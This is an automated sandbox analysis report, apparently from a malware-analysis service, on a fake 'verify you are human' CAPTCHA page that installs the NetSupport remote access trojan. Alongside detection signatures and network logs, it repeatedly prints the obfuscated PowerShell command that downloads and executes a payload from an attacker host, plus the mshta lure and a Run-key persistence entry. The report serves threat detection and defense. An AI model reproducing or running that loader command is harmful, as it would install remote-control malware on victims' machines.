Windows Analysis Report
https://webdemo.biz/

Overview

General Information

Sample URL: https://webdemo.biz/
Analysis ID: 1545769

Detection

NetSupport RAT, CAPTCHA Scam
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1936,i,13169113144443603828,12295898762207964987,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://webdemo.biz/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 2848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mshta.exe (PID: 7940 cmdline: "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 8036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 1284 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • cmd.exe (PID: 3428 cmdline: "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\HzYATQ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • attrib.exe (PID: 5940 cmdline: attrib +h C:\Users\user\AppData\Roaming\HzYATQ MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • client32.exe (PID: 7688 cmdline: "C:\Users\user\AppData\Roaming\HzYATQ\client32.exe" MD5: EE75B57B9300AAB96530503BFAE8A2F2)
  • cleanup
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
00000013.00000000.1798242317.000000000075F000.00000002.00000001.01000000.0000000E.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000013.00000000.1798242317.0000000000752000.00000002.00000001.01000000.0000000E.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000013.00000002.2445421109.000000006C620000.00000002.00000001.01000000.00000013.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000013.00000002.2432544549.00000000026A8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000013.00000002.2427181578.0000000000752000.00000002.00000001.01000000.0000000E.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
1.0.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam | Joe Security |

System Summary

Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7940, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 8036, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8036, TargetFilename: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://webdemo.biz/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 2537'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7940, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 8036, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2848, ProcessName: svchost.exe

Remote Access Functionality

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8036, TargetFilename: C:\Users\user\AppData\Roaming\HzYATQ\NSM.LIC

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T00:15:42.254947+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP
2024-10-31T00:15:43.896654+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP
2024-10-31T00:15:45.856988+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP
2024-10-31T00:15:46.019053+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP
2024-10-31T00:15:46.243368+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP
2024-10-31T00:15:46.411456+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP
2024-10-31T00:15:46.663800+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP
2024-10-31T00:15:46.866278+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP
2024-10-31T00:15:52.195934+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP
2024-10-31T00:15:53.167434+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49739 | 166.1.160.211 | 80 | TCP
2024-10-31T00:15:55.980864+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49740 | 166.1.160.211 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T00:15:03.265705+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49742 | 92.255.85.135 | 443 | TCP

Phishing

Source: https://webdemo.biz/ | LLM: Score: 8 Reasons: The brand 'CloudFlare' is well-known and typically associated with the domain 'cloudflare.com'., The provided URL 'webdemo.biz' does not match the legitimate domain for CloudFlare., The domain 'webdemo.biz' is generic and does not have any direct association with CloudFlare., The use of a '.biz' domain extension is unusual for a well-known brand like CloudFlare, which typically uses '.com'., The input fields 'u, n, k, n, o, w, n' do not provide any clear context or association with CloudFlare services. DOM: 1.0.pages.csv
Source: Yara match | File source: 1.0.pages.csv, type: HTML
Source: https://webdemo.biz/ | HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#fc574a" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#fc574a" d="M17.038 18.615H14.87L14.563 9.5h2....
Source: https://webdemo.biz/ | HTTP Parser: No favicon
Source: https://webdemo.biz/ | HTTP Parser: No favicon
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe | File opened: C:\Users\user\AppData\Roaming\HzYATQ\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.171.84.254:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 166.1.160.75:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 166.1.160.211:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: chrome.exe | Memory has grown: Private usage: 27MB later: 38MB

Networking

Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49742 -> 92.255.85.135:443
Source: http | Image file has PE prefix: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Wed, 30 Oct 2024 23:15:53 GMT Content-Type: image/png Content-Length: 396664 Last-Modified: Mon, 21 Oct 2024 07:35:59 GMT Connection: keep-alive ETag: "6716045f-60d78" Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Wed, 30 Oct 2024 23:15:53 GMT Content-Type: image/png Content-Length: 396664 Last-Modified: Mon, 21 Oct 2024 07:35:59 GMT Connection: keep-alive ETag: "6716045f-60d78" Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49737 -> 166.1.160.211:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49739 -> 166.1.160.211:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49740 -> 166.1.160.211:80
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: global traffic | HTTP traffic detected: GET /o/1.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: thecopycat.biz Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /o/2.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: thecopycat.biz
Source: global traffic | HTTP traffic detected: GET /o/3.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: thecopycat.biz
Source: global traffic | HTTP traffic detected: GET /o/4.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: thecopycat.biz
Source: global traffic | HTTP traffic detected: GET /o/5.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: thecopycat.biz
Source: global traffic | HTTP traffic detected: GET /o/6.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerS